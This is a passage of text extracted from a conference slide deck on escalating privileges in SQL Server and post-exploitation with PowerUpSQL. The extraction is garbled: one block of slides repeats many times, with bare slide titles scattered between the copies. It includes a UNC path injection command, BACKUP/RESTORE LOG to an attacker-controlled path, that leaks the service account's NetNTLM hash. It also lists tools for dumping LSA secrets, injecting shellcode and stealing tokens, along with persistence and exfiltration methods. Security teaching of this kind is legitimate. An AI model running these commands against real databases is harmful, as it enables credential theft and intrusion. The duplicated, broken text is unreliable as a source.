But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges SysAdmin to Service Account (2)
Escalating Privileges SysAdmin to Service Account (3)
Escalating Privileges Invoke-SQLOSCmd
Slide 67
Escalating Privileges Shared Service Accounts
Slide 69
Slide 70
Slide 71
Slide 72
Slide 73
Escalating Privileges Crawling SQL Server Links
Slide 75
Slide 76
Slide 77
Slide 78
Escalating Privileges Crawling SQL Server Links (2)
Escalating Privileges Crawling Server Links
Escalating Privileges Crawling Server Links (2)
Escalating Privileges Crawling Server Links (3)
Escalating Privileges Database Links
Escalating Privileges Crawling Server Links (4)
Slide 85
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection (2)
Escalating Privileges UNC Path Injection (3)
Escalating Privileges UNC Path Injection (4)
Escalating Privileges UNC Path Injection (5)
Escalating Privileges UNC Path Injection (6)
Escalating Privileges DEMO (4)
Escalating Privileges UNC Path Injection (7)
Slide 94
Escalating Privileges OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdmin (2)
Escalating Privileges OS Admin to SysAdmin (3)
Slide 98
Post Exploitation Overview
Post Exploitation Persistence
Post Exploitation Persistence (2)
Post Exploitation Finding Sensitive Data
Post Exploitation Finding Sensitive Data (2)
Post Exploitation Finding Sensitive Data (3)
Slide 105
General Recommendations
PowerUpSQL Overview Thanks
Speaker Information Questions
Escalating Privileges UNC Path Injection
Another Issue
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges SysAdmin to Service Account (2)
Escalating Privileges SysAdmin to Service Account (3)
Escalating Privileges Invoke-SQLOSCmd
Slide 67
Escalating Privileges Shared Service Accounts
Slide 69
Slide 70
Slide 71
Slide 72
Slide 73
Escalating Privileges Crawling SQL Server Links
Slide 75
Slide 76
Slide 77
Slide 78
Escalating Privileges Crawling SQL Server Links (2)
Escalating Privileges Crawling Server Links
Escalating Privileges Crawling Server Links (2)
Escalating Privileges Crawling Server Links (3)
Escalating Privileges Database Links
Escalating Privileges Crawling Server Links (4)
Slide 85
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection (2)
Escalating Privileges UNC Path Injection (3)
Escalating Privileges UNC Path Injection (4)
Escalating Privileges UNC Path Injection (5)
Escalating Privileges UNC Path Injection (6)
Escalating Privileges DEMO (4)
Escalating Privileges UNC Path Injection (7)
Slide 94
Escalating Privileges OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdmin (2)
Escalating Privileges OS Admin to SysAdmin (3)
Slide 98
Post Exploitation Overview
Post Exploitation Persistence
Post Exploitation Persistence (2)
Post Exploitation Finding Sensitive Data
Post Exploitation Finding Sensitive Data (2)
Post Exploitation Finding Sensitive Data (3)
Slide 105
General Recommendations
PowerUpSQL Overview Thanks
Speaker Information Questions
